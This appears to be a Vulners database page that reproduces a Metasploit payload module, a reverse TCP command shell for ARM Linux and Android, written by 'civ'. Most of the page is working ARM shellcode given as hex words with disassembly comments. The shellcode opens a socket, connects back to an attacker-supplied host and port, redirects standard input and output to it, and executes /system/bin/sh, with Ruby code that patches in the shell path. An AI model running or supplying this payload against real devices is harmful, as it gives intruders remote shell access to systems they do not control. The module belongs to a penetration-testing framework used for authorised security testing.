Lucene search
K

Linux Command Shell, Reverse TCP Inline

🗓️ 25 Aug 2010 21:44:33Reported by civType 
metasploit
 metasploit
🔗 www.rapid7.com👁 57 Views

Linux Command Shell, Reverse TCP Inline, Connect back to attacker and spawn a command shel

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = 172

  include Msf::Payload::Single
  include Msf::Payload::Linux::Armle::Prepends
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => 'civ',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_ARMLE,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'LHOST'    => [ 136, 'ADDR' ],
              'LPORT'    => [ 134, 'n' ],
            },
          'Payload' =>
            [
              #### Tested successfully on:
              # Linux 2.6.29.6-cm42 armv6l
              # Linux 2.6.29.6-cyanogenmod armv6l
              # Linux version 2.6.25-00350-g40fff9a armv5l
              # Linux version 2.6.27-00110-g132305e armv5l
              # Linux version 2.6.29-00177-g24ee4d2 armv5l
              # Linux version 2.6.29-00255-g7ca5167 armv5l
              #
              # Probably requires process to have INTERNET permission
              # or root.
              ####
              # socket(2,1,6)
              0xe3a00002,       # mov     r0, #2  ; 0x2
              0xe3a01001,       # mov     r1, #1  ; 0x1
              0xe2812005,       # add     r2, r1, #5      ; 0x5
              0xe3a0708c,       # mov     r7, #140        ; 0x8c
              0xe287708d,       # add     r7, r7, #141    ; 0x8d
              0xef000000,       # svc     0x00000000

              # connect(soc, socaddr, 0x10)
              0xe1a06000,       # mov     r6, r0
              0xe28f1060,       # 1dr     r1, pc, #96  ; 0x60
              0xe3a02010,       # mov     r2, #16 ; 0x10
              0xe3a0708d,       # mov     r7, #141        ; 0x8d
              0xe287708e,       # add     r7, r7, #142    ; 0x8e
              0xef000000,       # svc     0x00000000

              # dup2(soc,0) @stdin
              0xe1a00006,       # mov     r0, r6
              0xe3a01000,       # mov     r1, #0  ; 0x0
              0xe3a0703f,       # mov     r7, #63 ; 0x3f
              0xef000000,       # svc     0x00000000

              # dup2(soc,1) @stdout
              0xe1a00006,       # mov     r0, r6
              0xe3a01001,       # mov     r1, #1  ; 0x1
              0xe3a0703f,       # mov     r7, #63 ; 0x3f
              0xef000000,       # svc     0x00000000

              # dup2(soc,2) @stderr
              0xe1a00006,       # mov     r0, r6
              0xe3a01002,       # mov     r1, #2  ; 0x2
              0xe3a0703f,       # mov     r7, #63 ; 0x3f
              0xef000000,       # svc     0x00000000

              # execve("/system/bin/sh", args, env)
              0xe28f0024,       # add     r0, pc, #36     ; 0x24
              0xe0244004,       # eor     r4, r4, r4
              0xe92d0010,       # push    {r4}
              0xe1a0200d,       # mov     r2, sp
              0xe28f4024,       # add     r4, pc, #36     ; 0x10
              0xe92d0010,       # push    {r4}
              0xe1a0100d,       # mov     r1, sp
              0xe3a0700b,       # mov     r7, #11 ; 0xb
              0xef000000,       # svc     0x00000000

              # <af>:
              # port offset = 134, ip offset = 136
              0x04290002,       # .word   0x5c110002 @ port: 4444 , sin_fam = 2
              0x0101a8c0,       # .word   0x0101a8c0 @ ip: 192.168.1.1
              # <shell>:
              0x00000000,       # .word   0x00000000 ; the shell goes here!
              0x00000000,       # .word   0x00000000
              0x00000000,       # .word   0x00000000
              0x00000000,       # .word   0x00000000
              # <arg>:
              0x00000000,       # .word   0x00000000 ; the args!
              0x00000000,       # .word   0x00000000
              0x00000000,       # .word   0x00000000
              0x00000000,       # .word   0x00000000

            ].pack("V*")
        }
      ))

    # Register command execution options
    register_options(
      [
        OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),
        OptString.new('ARGV0', [ false, "argv[0] to pass to execve", "sh" ]) # mostly used for busybox
      ])
  end

  def generate(_opts = {})
    p = super

    sh = datastore['SHELL']
    if sh.length >= 16
      raise ArgumentError, "The specified shell must be less than 16 bytes."
    end
    p[140, sh.length] = sh

    arg = datastore['ARGV0']
    if arg
      if arg.length >= 16
        raise ArgumentError, "The specified argv[0] must be less than 16 bytes."
      end
      p[156, arg.length] = arg
    end

    p
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation